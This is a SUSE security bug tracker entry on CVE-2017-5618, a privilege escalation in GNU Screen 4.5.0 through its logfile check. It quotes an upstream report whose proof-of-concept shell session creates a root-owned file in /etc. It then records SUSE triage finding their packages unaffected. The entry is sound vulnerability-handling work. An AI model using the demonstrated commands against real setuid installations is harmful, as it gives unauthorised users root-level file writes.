Bug 1021743 (CVE-2017-5618) - VUL-0: CVE-2017-5618: screen: privilege escalation via log file
Summary: VUL-0: CVE-2017-5618: screen: privilege escalation via log file
Status: RESOLVED WORKSFORME
Alias: CVE-2017-5618
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents (show other bugs)
Version: unspecified
Hardware: Other Other
: P3 - Medium : Major
Target Milestone: ---
Assignee: Michael Schröder
QA Contact: Security Team bot
URL: https://smash.suse.de/issue/179086/
Whiteboard:
Keywords:
Depends on:
Blocks:
 
Reported: 2017-01-24 22:11 UTC by Andreas Stieger
Modified: 2017-01-29 16:45 UTC (History)
6 users (show)

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Andreas Stieger 2017-01-24 22:11:14 UTC 
https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html

From: 	anonymous
Subject: 	[screen-devel] [bug #50142] root exploit 4.5.0
Date: 	Tue, 24 Jan 2017 19:05:10 +0000 (UTC)
User-agent: 	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0

URL:
  <http://savannah.gnu.org/bugs/?50142>

                 Summary: root exploit 4.5.0
                 Project: GNU Screen
            Submitted by: None
            Submitted on: Tue 24 Jan 2017 07:05:09 PM UTC
                Category: Program Logic
                Severity: 3 - Normal
                Priority: 5 - Normal
                  Status: None
                 Privacy: Private
             Assigned to: None
             Open/Closed: Open
         Discussion Lock: Any
                 Release: None
           Fixed Release: None
         Planned Release: None
           Work Required: None

    _______________________________________________________

Details:

Commit f86a374 ("screen.c: adding permissions check for the logfile name",
2015-11-04)

The check opens the logfile with full root privileges. This allows us to
truncate any file or create a root-owned file with any contents in any
directory and can be easily exploited to full root access in several ways.

> address@hidden:~$ screen --version
> Screen version 4.05.00 (GNU) 10-Dec-16
> address@hidden:~$ id
> uid=125(buczek) gid=125(buczek)
groups=125(buczek),15(users),19(adm),42(admin),154(Omp3grp),200(algrgrp),209(cdgrp),242(gridgrp),328(nchemgrp),407(hoeheweb),446(spwgrp),453(helpdesk),512(twikigrp),584(zmgrp),598(edv),643(megamgrp),677(greedgrp),5000(abt_srv),16003(framesgr),16012(chrigrp),17001(priv_cpw)
> address@hidden:~$ cd /etc
> address@hidden:/etc (master)$ screen -D -m -L bla.bla echo fail
> address@hidden:/etc (master)$ ls -l bla.bla
> -rw-rw---- 1 root buczek 6 Jan 24 19:58 bla.bla
> address@hidden:/etc (master)$ cat bla.bla
> fail
> address@hidden:/etc (master)$ 

Donald Buczek <address@hidden>


=============

Uhm, the executing screen process already runs as root? Not sure about this

References:
http://seclists.org/oss-sec/2017/q1/181
https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
http://savannah.gnu.org/bugs/?50142
Comment 1 Andreas Stieger 2017-01-24 22:14:03 UTC 
Debian runs setgid utmp:
https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00027.html
Comment 3 Swamp Workflow Management 2017-01-24 23:02:27 UTC 
bugbot adjusting priority
Comment 4 Marcus Meissner 2017-01-25 07:14:42 UTC 
our screen is not setuid nor setgid as we use the utempter helper.

issue does not reproduce.
Comment 5 Andreas Stieger 2017-01-25 08:24:27 UTC 
The first GNU screen release to contain this issue is v.4.5.0:
SLE not affected.
openSUSE Leap, Tumbleweed not affected. (4.4.0)

Base:System/screen has 4.5.0 with affected code.
However as the issue relies on setuid/setgid. Resolving issue.